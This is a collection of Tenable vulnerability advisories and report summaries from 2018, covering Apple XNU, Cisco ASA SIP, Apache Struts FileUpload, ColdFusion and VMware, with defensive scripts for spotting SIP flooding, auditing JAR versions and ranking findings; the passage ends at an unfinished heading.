
Buffer Overflow Vulnerability in Apple iOS and macOS Devices Disclosed


A researcher has disclosed a buffer overflow vulnerability in Apple’s XNU operating system kernel that allows attackers on a local network to reboot Apple’s iOS and macOS devices and could potentially lead to remote code execution.

Background

On October 30, researcher Kevin Backhouse of Semmle published a blog on his discovery of a buffer overflow vulnerability in Apple’s XNU operating system kernel (CVE-2018-4407). Specifically, the vulnerability exists in the networking code for XNU for how packets are handled. The vulnerability affects OS X, macOS and iOS devices. Backhouse released a proof of concept (PoC) video demonstrating how this vulnerability can be used to crash macOS and iOS devices on a local network.

The PoC has been withheld to allow time for Apple users to upgrade their devices.

Impact assessment

According to Backhouse, this vulnerability affects iOS devices running iOS 11 and earlier. It also affects legacy devices running Apple’s OS X operating system from El Capitan and earlier, as well as macOS Sierra and High Sierra. The vulnerability was reported to Apple in August 2018 and has been patched in iOS 12 and macOS Mojave.

Vulnerability details

This vulnerability allows a local network attacker to send a specially crafted Internet Protocol (IP) packet to unsuspecting Apple users that triggers a device reboot (or denial of service). While not demonstrated, Backhouse reports that this vulnerability could lead to remote code execution because an attacker can “control the size and content of the heap buffer overflow.” Additionally, he asserts, “the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you[...] It also doesn't matter what software you are running on the device - the malicious packet will still trigger the vulnerability even if you don't have any ports open.”

Urgently required actions

Apple users should upgrade to the latest versions of their respective operating systems. In this case, both iOS 12 and macOS Mojave (10.14) have addressed this vulnerability. Apple has also addressed this vulnerability in macOS Sierra and macOS High Sierra.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.


Cisco ASA and Firepower Being Exploited in the Wild - Apply Mitigations ASAP


Cisco advised that the Adaptive Security Appliance (ASA) and Firepower systems are being exploited in the wild with a Session Initiation Protocol (SIP) vulnerability. There is currently no patch.

Background

Cisco posted an advisory today warning users that their popular Adaptive Security Appliance (ASA) and Firepower Threat Defense Software are vulnerable to a Session Initiation Protocol (SIP) handling bug currently being exploited in the wild. As of November 1 10:00 a.m. (EST), there is no patch or workaround available. In the meantime, Cisco has provided mitigation guidance.

Impact assessment

According to Cisco: “While the vulnerability described in this advisory is being actively exploited, the output of show conn port 5060 will show a large number of incomplete SIP connections and the output of show processes cpu-usage non-zero sorted will show a high CPU utilization. Successful exploitation of this vulnerability can also result in a denial of service (DOS) causing the affected device to crash and reload. After the device boots up again, the output of show crashinfo will show an unknown abort of the DATAPATH thread.”
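As an added illustration, not taken from the Cisco advisory or from Tenable, the following Python script applies the indicator Cisco describes to saved `show conn port 5060` output: it parses each connection line, counts connections that never completed per outside peer, and reports peers above a threshold. The sample output lines, the "incomplete" heuristic (based on the flag string and byte count) and the default threshold are assumptions of this example, not Cisco's definitions.

```python
import re
from collections import Counter

# Constructed sample of `show conn port 5060` output; these lines are made up for
# the example and are not taken from the Cisco advisory. Peer addresses are
# RFC 5737 documentation ranges.
SAMPLE_SHOW_CONN = """\
TCP outside 203.0.113.10:40001 inside 10.1.1.5:5060, idle 0:00:02, bytes 0, flags saA
TCP outside 203.0.113.10:40002 inside 10.1.1.5:5060, idle 0:00:02, bytes 0, flags saA
TCP outside 203.0.113.10:40003 inside 10.1.1.5:5060, idle 0:00:01, bytes 0, flags saA
UDP outside 203.0.113.10:5060 inside 10.1.1.5:5060, idle 0:00:01, bytes 0, flags -
TCP outside 198.51.100.7:51200 inside 10.1.1.5:5060, idle 0:00:40, bytes 8120, flags UIO
"""

# One `show conn` line: protocol, outside interface/peer, inside interface/peer,
# idle time, byte count and the connection flag string.
CONN_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<out_if>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+"
    r"(?P<in_if>\S+)\s+(?P<dst>[\d.]+):(?P<dport>\d+),\s+idle\s+(?P<idle>[\d:]+),"
    r"\s+bytes\s+(?P<bytes>\d+),\s+flags\s+(?P<flags>\S+)$"
)


def parse_conn_line(line):
    """Return a dict for one connection line, or None for lines that do not match."""
    m = CONN_RE.match(line.strip())
    if not m:
        return None
    conn = m.groupdict()
    conn["bytes"] = int(conn["bytes"])
    conn["sport"] = int(conn["sport"])
    conn["dport"] = int(conn["dport"])
    return conn


def is_incomplete(conn):
    """Heuristic (an assumption of this example, not Cisco's definition): a TCP
    connection without the 'U' (up) flag never finished its handshake, and a
    UDP SIP flow that has carried zero bytes never got past the first packet."""
    if conn["proto"] == "TCP":
        return "U" not in conn["flags"]
    return conn["bytes"] == 0


def incomplete_sip_by_source(show_conn_output):
    """Count incomplete SIP (port 5060) connections per outside peer address."""
    counts = Counter()
    for line in show_conn_output.splitlines():
        conn = parse_conn_line(line)
        if conn is None or 5060 not in (conn["sport"], conn["dport"]):
            continue
        if is_incomplete(conn):
            counts[conn["src"]] += 1
    return dict(counts)


def suspicious_sources(show_conn_output, threshold=3):
    """Peers with at least `threshold` incomplete SIP connections, busiest first.
    The threshold is an arbitrary starting point; tune it to the site's normal
    SIP signalling volume."""
    counts = incomplete_sip_by_source(show_conn_output)
    return sorted(
        ((src, n) for src, n in counts.items() if n >= threshold),
        key=lambda item: (-item[1], item[0]),
    )


if __name__ == "__main__":
    for src, n in suspicious_sources(SAMPLE_SHOW_CONN):
        print(f"{src}: {n} incomplete SIP connections")
```

Paired with a CPU check from `show processes cpu-usage non-zero sorted`, a peer that dominates this list is a candidate for the "blocking the attacking host" mitigation in the advisory; the script only reads saved CLI output and changes nothing on the device.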

Vulnerability details

The vulnerability is reportedly caused by improper SIP inspection. SIP is a common protocol used for voice over IP (VoIP). It is also used for file transfer, instant messaging, video conferencing and streaming media. SIP can be run over TCP, UDP or other networking protocols. The following Cisco devices are listed as affected:

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4100 Series Security Appliance
  • Firepower 9300 ASA Security Module
  • FTD Virtual (FTDv)

The vulnerability reportedly does not impact the following devices:

  • ASA 1000V Cloud Firewall
  • ASA 5500 Series Adaptive Security Appliances

Urgently required actions

Due to the fact this issue is reportedly being exploited in the wild and the “default on” nature of SIP inspection, users are urged to apply the mitigations provided by Cisco ASAP. Several mitigating controls are provided:

  • Disabling SIP inspection (on by default): Disabling SIP inspection will completely close the attack vector for this vulnerability. However, it may not be suitable for everyone. In particular, disabling SIP inspection would break SIP connections if either Network Address Translation (NAT) is applied to SIP traffic or if not all ports required for SIP communication are opened via ACL. To disable SIP inspection, configure the following:

Cisco ASA Software and Cisco FTD Software Releases 6.2 and later (in FTD 6.2 and later use Cisco FMC to add the following via FlexConfig policy):

<code>
policy-map global_policy
 class inspection_default
  no inspect sip
</code>

Cisco FTD Software Releases prior to 6.2:

<code>
configure inspection sip disable
</code>

Additionally, the mitigations below are described in the advisory:

  • Blocking the attacking host
  • Filtering on Sent-by Address of 0.0.0.0, as that address has reportedly been used by attackers in ongoing exploitation

Identifying affected systems

Tenable is actively monitoring for any updates provided by Cisco and will provide plugin coverage as soon as it becomes available.

Get more information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Apache Struts Patches Remote Code Execution Vulnerability in FileUpload Library (CVE-2016-1000031)


Apache Software Foundation announces a security update for Apache Struts to address a vulnerability in the Commons FileUpload library that could lead to remote code execution. We recommend updating now.

Background

On November 5, the Apache Software Foundation (ASF) published a security announcement to Apache Struts project administrators about CVE-2016-1000031, a vulnerability in the Commons FileUpload library originally reported by Tenable’s Research team in 2016. This library ships as part of Apache Struts 2 and is used as the default mechanism for file uploads. The ASF reports that Apache Struts 2.3.36 and prior are vulnerable. A remote attacker could use this vulnerability to gain remote code execution on publicly accessible websites running a vulnerable version of Apache Struts.

Vulnerability details

For details about this vulnerability, please review the Tenable Research Advisory for the Apache Commons FileUpload DiskFileItem File Manipulation Remote Code Execution (LOBSTER).

Urgently required actions

The ASF confirms that Apache Struts version 2.5.12 and above include the patched version of the commons-fileupload library, version 1.3.3. If possible, Apache Struts project administrators should upgrade to 2.5.12 and above. The ASF also notes that the patched version of the commons-fileupload library can be dropped into projects that have already been deployed by simply replacing the JAR file in the WEB-INF/lib path with the fixed version. Maven based Struts projects can address this vulnerability by adding in the following dependency:

<dependency>
  <groupId>commons-fileupload</groupId>
  <artifactId>commons-fileupload</artifactId>
  <version>1.3.3</version>
</dependency>
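Because the ASF's workaround is to swap the JAR in WEB-INF/lib, a quick way to confirm a deployed application actually carries the fixed library is to inspect what is on disk. The following Python script is an added example (not Tenable's plugin logic and not ASF code): it finds commons-fileupload JARs in a lib directory, takes the version from the file name or, failing that, from Implementation-Version in the JAR manifest, and flags anything older than 1.3.3. The demo directory it builds contains constructed stub JARs (manifest only, no classes); the directory layout and file names are assumptions of the example.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# First commons-fileupload version that carries the fix named in the advisory.
FIXED_VERSION = (1, 3, 3)

# Version embedded in a conventionally named JAR, e.g. commons-fileupload-1.3.2.jar
JAR_NAME_RE = re.compile(r"^commons-fileupload-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """'1.3.2' -> (1, 3, 2); tuples compare correctly as version numbers."""
    return tuple(int(part) for part in text.strip().split("."))


def jar_version(jar_path):
    """Take the version from the file name if present, otherwise from
    Implementation-Version in META-INF/MANIFEST.MF. Returns None if neither is found."""
    jar_path = Path(jar_path)
    m = JAR_NAME_RE.match(jar_path.name)
    if m:
        return parse_version(m.group(1))
    with zipfile.ZipFile(jar_path) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "Implementation-Version":
            return parse_version(value)
    return None


def is_vulnerable(version):
    """Anything below 1.3.3 is affected; an unknown version is reported separately."""
    return version is not None and version < FIXED_VERSION


def audit_lib_dir(lib_dir):
    """Inspect every commons-fileupload JAR under a WEB-INF/lib directory.
    Returns (file name, version tuple or None, vulnerable?) per JAR, sorted by name."""
    results = []
    for jar in sorted(Path(lib_dir).glob("*.jar")):
        if "commons-fileupload" not in jar.name:
            continue  # a repackaged or renamed copy would need a class-level check instead
        version = jar_version(jar)
        results.append((jar.name, version, is_vulnerable(version)))
    return results


def _write_stub_jar(path, version):
    # Constructed stand-in for a real JAR: a manifest only, no classes.
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(
            "META-INF/MANIFEST.MF",
            f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n",
        )


def build_demo_lib_dir():
    """Create a throwaway WEB-INF/lib with one old JAR, one fixed JAR whose version
    is only in the manifest, and an unrelated JAR that must be ignored."""
    lib = Path(tempfile.mkdtemp(prefix="webinf-lib-"))
    _write_stub_jar(lib / "commons-fileupload-1.3.2.jar", "1.3.2")
    _write_stub_jar(lib / "commons-fileupload.jar", "1.3.3")
    _write_stub_jar(lib / "commons-io-2.4.jar", "2.4")
    return lib


if __name__ == "__main__":
    for name, version, vulnerable in audit_lib_dir(build_demo_lib_dir()):
        status = "VULNERABLE" if vulnerable else ("unknown version" if version is None else "ok")
        print(f"{name}: {version} -> {status}")
```

Point `audit_lib_dir()` at a real application's WEB-INF/lib to use it outside the demo. A JAR with no usable version is returned with `None` rather than silently passed, so it can be reviewed by hand.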

Identifying affected systems

A list of Nessus plugins to identify this vulnerability can be found here.

Get more information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Three Vulnerability Intelligence Insights Worth Your Attention


<p>The <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>, released today by Tenable Research, provides an overview of current vulnerability disclosure trends and insights into real-world vulnerability demographics in enterprise environments. Here are three highlights from the report.</p>
<p>Because vulnerabilities are the fulcrum for everything we do at Tenable Research, the state of the vulnerability ecosystem is of particular interest to us.</p>
<p>To gain a full-spectrum view of the vulnerability ecosystem, you must first consider the developments and trends in vulnerability research and disclosure. This aspect is well studied, with many vendors and industry organizations regularly publishing commentary on trends in the Common Vulnerabilities and Exposures (CVE) and National Vulnerability Database (NVD). Knowing about the diversity, growth and evolution of vulnerabilities and common weaknesses gives us a feel for what is potentially out there, but provides only descriptive information. CVE and NVD tell you which vulnerabilities exist in theory - not in practice - and give no insight into the live, active population of vulnerabilities.</p>
<p>Understanding what vulnerabilities really exist requires insight into end-user behavior and telemetry, something unique to Tenable Research. We know what the live vulnerability population is. Out of the 107,710 distinct CVEs published since 1999, 22,625 (23 percent) actually exist in enterprise environments. That’s the true vulnerability ecosystem. The remainder have gone extinct or are hiding in the digital equivalent of Lake Vostok.</p>
<p>We are seeing continuing growth in the relative and absolute numbers of vulnerabilities. In 2017, 15,038 new vulnerabilities were published versus 9,837 in 2016, an increase of 53 percent. Comparing the first half of 2018 to the first half of 2017, we are currently on track for an increase of 27 percent, or a projected 18,000–19,000 new vulnerabilities this year. Realistically, our projection is probably conservative.</p>
<p>Effective threat and vulnerability management is now dictated by scale and complexity, volume and velocity - the scale and complexity of distributed, mobile and heterogeneous networks and users, the volume of resulting vulnerabilities, and the velocity with which new vulnerabilities are disclosed and exploited in the wild. More than ever, this requires actionable intelligence. We’re not exempt from this requirement here at Tenable Research, and we practice what we preach. The result: our <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>. And because we believe in full disclosure and intelligence sharing, we are sharing it with our community.</p>
<p>You can grab a copy of the report <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">here</a>. In the meantime, I’d like to discuss three things that really stood out to us in Tenable Research:</p>
<h2>CVSS version 3 has aggravated the prioritization problem</h2>
<p>CVSS version 3 was introduced in 2015, and was intended to resolve some limitations in how version 2 assessed the impact of a vulnerability, amongst other changes. While version 3 scores are rarely available for older vulnerabilities, most vulnerabilities from 2016 onwards have begun receiving CVSSv3 scores. Feedback from the field and third-party reports have noted weaknesses in version 3 since its release. Our own analysis supports the critique, showing that CVSSv3 scores the majority of vulnerabilities as High and Critical.</p>
<p>As Figure 1 shows, CVSSv2 scored 31 percent of CVEs as High severity, versus 60 percent with High or Critical severity under CVSSv3.</p>
<p>Used on its own, CVSSv3 aggravates, rather than resolves, the prioritization challenge. Before this is interpreted as an endorsement of using CVSSv2, the original cause for adopting version 3 still remains - version 2 does not reliably reflect the risk that a vulnerability represents to other system components.</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/VulnIntelligence-CVEs-Overall.jpg" width="940" height="423" alt="Tenable Vulnerability Intelligence Report - CVEs overall – CVSS severity distributions" /></p>
<p><i>Figure 1: CVEs overall – CVSS severity distributions</i></p>
<h2>Legacy vulnerabilities still represent a residual risk</h2>
<p>In the second section of the report, we look at vulnerability prevalence - vulnerabilities that actually exist in enterprise environments - by analyzing the data from over 900,000 vulnerability assessment scans conducted between March and August 2018. We also drilled down into Web Browser and Application vulnerabilities, due to their inclusion in Exploit Kits, and other client-side attacks. What immediately stood out for us? Many of the vulnerabilities enterprises are detecting are in old or legacy software.</p>
<p>Figure 2 clearly shows the concentration of Firefox vulnerabilities from 2012 to 2017, peaking in 2015. Firefox has just over 10 percent of the web browser market share, but actually represented 53 percent of all High severity vulnerabilities in our data set. Firefox vulnerabilities are not being remediated.</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Report-VulnIntelligence-Fig17.jpg" width="2182" height="501" alt="" /></p>
<p><i>Figure 2: Distinct High severity Web Browser CVEs prevalent in enterprise environments</i></p>
<p>As you can see in Figure 3, there is a similar phenomenon for Microsoft Office and Oracle Java.</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Report-VulnIntelligence-Fig23.jpg" width="2182" height="501" alt="" /></p>
<p><i>Figure 3: Distinct High severity Application CVEs prevalent in enterprise environments</i></p>
<p>There may be reasonable business justifications for retaining legacy systems and software. Java, especially, is known to cause challenges due to version dependencies. In those cases, the vulnerable systems can be segmented, or the software can even be installed on a virtual system and only started on an as-needed basis. Without a legitimate business reason though, these applications represent an avoidable residual risk.</p>
<h2>Exploitability is insufficiently used as a prioritization criterion</h2>
<p>When a vulnerability is first discovered, it’s a hypothetical risk. With the publication of an exploit, that vulnerability becomes a potential risk if it’s present on your system. Our research shows that for seven percent of disclosed vulnerabilities in 2017, public exploits were available. While that still left enterprises with up to 751 vulnerabilities to prioritize, it’s better than the volume they would have been left with by using CVSSv3 alone to prioritize. That approach would have given them 8,120 vulnerabilities (54 percent of the total) with a CVSSv3 score of 7.0 or higher to prioritize. Even narrowing this to only CVSSv3 9.0-10, “Critical” would have left 1,804 vulnerabilities (12 percent).</p>
<p>The information is available to most end users in their VA solution, and is automatically operationalized by correlating exploitability data with detected vulnerabilities.</p>
<p>When we analyzed the 609 distinct High severity application vulnerabilities in our data set, we discovered the majority of missing security updates fixed vulnerabilities for which public exploits are available. As you can see in Figure 4, public exploits are available for a whopping 79 percent of the missing security updates that address High severity Adobe Flash vulnerabilities and were detected as missing by enterprises in their environments. For Adobe PDF, the figure is 96 percent. Considering that Flash-enabled content on the internet has steeply declined and will be unsupported as of 2020, there is little value in keeping Flash installed. It does, however, represent a huge residual risk. The lowest percentage in any application group of missing security updates addressing a vulnerability with a public exploit available in the dataset was 41 percent.</p>
<p style="text-align: center;"><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/AdobeFlashExploits.jpg" width="287" height="370" alt="" /></p>
<p><i>Figure 4: Public exploits are available for a whopping 79 percent of the missing security updates that address High severity Adobe Flash vulnerabilities</i></p>
<p>Considering how useful exploitability is as a criterion to evaluate whether a vulnerability represents an acute risk, and that the information is widely available, this finding surprised us. There is definitely a need for raising awareness in the community of this simple but effective prioritization criterion.</p>
<p>These are just three of the key findings that caught our attention. You can read the full report <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">here<...
<p><b>Learn More:</b></p>
<ul>
<li>Download the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>.</li>
<li>Read the eBook: <a href="https://www.tenable.com/whitepapers/how-to-prioritize-cybersecurity-risk... to Prioritize Cybersecurity Risk: A Primer for CISOs</a>.</li>
<li>Read our exec blog: <a href="https://www.tenable.com/blog/vulnerability-intelligence-report-a-risk-ce... Intelligence Report: A Risk-Centric Approach To Prioritization</a>.</li>
</ul>

Vulnerability Intelligence Report: A Risk-Centric Approach To Prioritization


<p>Tenable Research set out to provide organizations with the real-world data they need to take a risk-centric approach to vulnerability management.</p>
<p>Insight into the true state of cyber exposure - how defenders are actually acting - not how they think or say they are, has so far been difficult to discern.</p>
<p>The newly released <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a> provides an overview of current vulnerability disclosure trends and insights into real-world vulnerability demographics in enterprise environments. The report analyzes vulnerability prevalence in the wild, based on the number of affected enterprises, to highlight vulnerabilities that security practitioners are dealing with in practice, not just in theory.</p>
<p>With 61% of all vulnerabilities detected in enterprise environments rated as a High severity, cybersecurity teams are challenged to determine which vulnerabilities truly represent a risk. They need to prioritize the most critical vulnerabilities to maximize limited remediation resources. When everything is urgent, triage fails.</p>
<h2>Better prioritization is critical</h2>
<p>In order to prioritize, organizations first need to better understand the actual, not theoretical, impact of vulnerabilities. As a prioritization metric, CVSS has its shortcomings. It lacks granularity at scale and volume, as the majority of vulnerabilities are classified as High or Critical severity. The shift from CVSSv2 to CVSSv3 only adds to the problem, as the majority of vulnerabilities are now registered as either 'High' or 'Critical.'</p>
<p>Common sense dictates that if everything seems important, then nothing is – and a better way of prioritization is needed. Such insight needs to incorporate context, such as threat intelligence, so organizations can prioritize vulnerabilities based on actual threats 'in the wild.'</p>
<p>Tenable Research set out to provide such insight in the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report </a>.</p>
<p>The report analyzes vulnerability prevalence, based on the maximum number of affected enterprises on a single day, to highlight the vulnerabilities security practitioners are dealing with on a daily basis.</p>
<p>On average, an enterprise is finding 870 CVEs across 960 assets every single day. This means prioritization methodologies based on remediating only High severity CVEs still leave the average enterprise with more than 548 vulnerabilities per day to assess and prioritize, often on multiple systems.</p>
<p>This means prioritization methodologies based on remediating only critical CVEs will still leave the average enterprise with over a hundred vulnerabilities per day to prioritize per patch, often on multiple systems. Adding to the problem is the fact that vulnerabilities not defined as ‘critical’ (i.e., having a CVSS score lower than 9), can have a catastrophic effect – for example WannaCry exploited a vulnerability with a score below 9.0 (the vuln was listed as 8.5).</p>
<p>This study confirms managing vulnerabilities is a challenge of scale, velocity and volume. It is not just an engineering challenge, but requires a risk-centric view in order to prioritize thousands of vulnerabilities that superficially all seem the same.</p>
<p>The report introduces the Top 20 Vulnerability Chart – providing insight into the most prevalent vulnerabilities that exist across different technologies in the enterprises. The chart utilizes real-world telemetry data to reveal which vulnerabilities are actually present in enterprise environments and subsequently represent the greatest true risk. Organizations can use this information to put into perspective their own list of vulnerabilities as compared to the larger population.</p>
<h2>Key findings</h2>
<ul>
<li><i>The haystack is getting bigger</i> – 15,038 new vulnerabilities were published in 2017 in total, versus 9,837 in 2016, an increase of 53%. 2018 is on track for 18,000-19,000 new vulnerabilities. Almost two thirds (61%) of the vulnerabilities enterprises are finding in their environments have a CVSSv2 severity of High (7.0-10.0).</li>
<li><i>But there are few needles</i> - Public exploits are available for just 7% of all vulnerabilities. The reality is that, for most vulnerabilities, a working exploit is never developed and of those an even smaller subset are actively weaponized and employed by threat actors. Finding and fixing the 7% is critical to improving an organization’s cyber exposure.</li>
</ul>
<p>At current projections, more than 1,500 exploited vulnerabilities will be published in 2018, or just over 28 exploited vulnerabilities every week. Better insight is a necessity, not a ‘nice to have.’ Download the Vulnerability Intelligence Report <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">here</a> to gain the insight you need to begin building a risk-based approach to prioritization.</p>
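<p>Both this post and the companion "Three Vulnerability Intelligence Insights" post argue the same point: a CVSS-only cut-off leaves a large remediation set, while correlating exploit availability with detected findings shrinks it and orders it. The Python below is an added example, not Tenable code or the report's methodology, that makes the comparison concrete on a small constructed set of findings. The CVE identifiers, scores and asset counts are invented placeholders, and the ordering rule (exploitable first, then CVSSv3, then asset count) is one reasonable choice, not a prescription.</p>

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    cve: str            # placeholder ids in the sample below, not real CVE numbers
    cvss_v3: float
    exploit_public: bool
    assets: int         # number of assets on which the finding was detected


# Constructed sample of scan findings; ids, scores and counts are invented.
SAMPLE_FINDINGS = [
    Finding("CVE-0000-0001", 9.8, True, 40),
    Finding("CVE-0000-0002", 9.1, False, 12),
    Finding("CVE-0000-0003", 7.5, True, 300),
    Finding("CVE-0000-0004", 7.2, False, 5),
    Finding("CVE-0000-0005", 5.3, True, 80),
    Finding("CVE-0000-0006", 4.0, False, 900),
]


def cvss_high_or_critical(findings):
    """CVSSv3 7.0 and above: 'High' plus 'Critical'."""
    return [f for f in findings if f.cvss_v3 >= 7.0]


def cvss_critical(findings):
    """CVSSv3 9.0 and above only."""
    return [f for f in findings if f.cvss_v3 >= 9.0]


def exploitable(findings):
    """Findings for which a public exploit is known."""
    return [f for f in findings if f.exploit_public]


def triage_queue(findings):
    """Work order: exploitable findings first, then by CVSSv3 score, then by how
    many assets are affected. Returns CVE ids in the order they should be handled."""
    ordered = sorted(findings, key=lambda f: (not f.exploit_public, -f.cvss_v3, -f.assets))
    return [f.cve for f in ordered]


def summarize(findings):
    """Size of each candidate remediation set, for side-by-side comparison."""
    return {
        "total": len(findings),
        "cvss_ge_7": len(cvss_high_or_critical(findings)),
        "cvss_ge_9": len(cvss_critical(findings)),
        "exploit_public": len(exploitable(findings)),
        "exploit_public_and_cvss_ge_7": len(exploitable(cvss_high_or_critical(findings))),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_FINDINGS))
    print(triage_queue(SAMPLE_FINDINGS))
```

<p>Note that the queue keeps the CVSSv3 5.3 finding with a public exploit ahead of the 9.1 finding without one; whether that is the right call for a given environment depends on exposure and asset criticality, which is exactly the context the report says a score alone cannot supply.</p>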
<p><b>Learn More:</b></p>
<ul>
<li>Download the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>.</li>
<li>Read the eBook: <a href="https://www.tenable.com/whitepapers/how-to-prioritize-cybersecurity-risk... to Prioritize Cybersecurity Risk: A Primer for CISOs</a>.</li>
<li>Read our tech blog: <a href="https://tenable.com/blog/three-vulnerability-intelligence-insights-worth... Vulnerability Intelligence Insights Worth Your Attention</a></li>
</ul>

APT Malware Activity Detected Exploiting a Patched ColdFusion Vulnerability (CVE-2018-15961)


<p>Researchers at Volexity have identified multiple groups exploiting CVE-2018-15961 in unpatched, web-facing Adobe ColdFusion servers. Users are urged to upgrade to the latest version of ColdFusion.</p>
<h2>Background</h2>
<p>On November 8, <a href="https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-pa... reported Advanced Persistent Threat (APT) and hacktivist groups have been targeting web-facing instances of Adobe ColdFusion that haven’t patched for <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15961">CVE-2018-15961</a>. Adobe released <a href="https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html">APS... to address the vulnerability on September 11, 2018.</p>
<h2>Impact assessment</h2>
<p>The researchers at Volexity identified two separate and unrelated attacks on a number of web-facing ColdFusion servers: a hacktivist group seeking to deface websites; and an APT attempting to hijack ColdFusion servers.</p>
<p>Pro-ISIS hacktivist AnoaGhost of “Typical Idiot Security” has been seen leaving defacing HTML index files on numerous sites that Volexity has identified as “educational institutions, state government, health research, humanitarian aid organizations, and more.”</p>
<p>In addition, a separate APT campaign was identified using the JavaServer Pages (JSP) version of China Chopper, a malicious web shell, to exploit <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15961">CVE-2018-15961</a>. Exploitation of this vulnerability can lead to remote code execution on the ColdFusion server. An attacker can take full control of a target once China Chopper has been uploaded as shown in the example below:</p>
<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/CChopper.png" width="856" height="350" alt="An attacker can take full control of a target once China Chopper has been uploaded as shown in this example." />
<p><i>Source: <a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-c...
<h2>Incident details</h2>
<p>The exact impact the APT group has had on any servers it has potentially attacked is unknown, but attacks on affected organizations are likely.</p>
<p>As far as the hacktivists are concerned, Volexity reports “Several of the affected websites contained an HTML index file that purported to be from the hacktivist group TYPICAL IDIOT SECURITY.”</p>
<p>The file in question appears as follows:</p>
<table>
<tr><td>
<p>Hacked by AnoaGhost – Typical Idiot Security</p>
<p>#together laugh in ur security since 2k17#</p>
<p>We are:~•Khunerable – SPEEDY-03 – PYS404 – Mirav – Grac3 – AnoaGhost – Jje Incovers – Panataran – magelangGetar – Kersen.id•</p>
</td></tr>
</table>
<h2>Urgently required actions</h2>
<p>To protect against these attacks, we highly recommend upgrading to the latest version of ColdFusion, which can be done from the administrator panel under Server Update &gt; Updates &gt; Settings.</p>
<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/cf-updates-1024x438.png" width="1024" height="438" alt="we highly recommend upgrading to the latest version of ColdFusion." />
<p><i>Source: <a href="https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-pa...
<h2>Identifying affected systems</h2>
<p>A list of Nessus plugins to identify this vulnerability can be found <a href="https://www.tenable.com/plugins/search?q=%22APSB18-33%22&sort=&page=1">h...
<h2>Get more information</h2>
<ul>
<li><a href="https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-pa... Blog</a></li>
<li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html">Adobe Security Advisory</a></li>
</ul>
<p><b>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management.</b></p>

VMware Issues Security Advisory for Guest-to-Host Escape Vulnerability (CVE-2018-6981)


<p>VMware issued an advisory about two uninitialized stack memory usage bugs and has released patches and updates for some versions of the affected software.</p>
<h2>Background</h2>
<p>On November 9, VMware published a security advisory to address a Guest-to-Host Escape vulnerability affecting VMware ESXi, Workstation and Fusion. The vulnerability was discovered and released by a security researcher at GeekPwn 2018, an annual security conference in Shanghai, China which took place in late October 2018. The researcher reported the vulnerability to VMware through GeekPwn.</p>
<p><i>Source: <a href="https://twitter.com/ChaitinTech/status/1057526019127676929">@ChaitinTech on Twitter</a>.</i></p>
<h2>Vulnerability details</h2>
<p>According to <a href="https://www.vmware.com/security/advisories/VMSA-2018-0027.html">VMware’s Security Advisory</a>, Zhangyanyu of <a href="https://www.chaitin.cn/en/">Chaitin Tech</a> reported two uninitialized stack memory usage bugs (CVE-2018-6981 and CVE-2018-6982) in the vmxnet3 virtual network adapter used in VMware. VMware notes that the vulnerability does not affect non-vmxnet3 virtual network adapters.</p>
<p>Exploitation of CVE-2018-6981 can lead to a guest-to-host escape, allowing the guest to execute code on the host, while exploitation of CVE-2018-6982 can lead to information disclosure from host to guest. In a tweet that includes <a href="https://twitter.com/ChaitinTech/status/1057526019127676929">a video demonstration of the exploit</a>, Chaitin Tech asserts that this is the first time that anyone has escaped VMware ESXi and obtained a root shell on the host.</p>
<h2>Urgently required actions</h2>
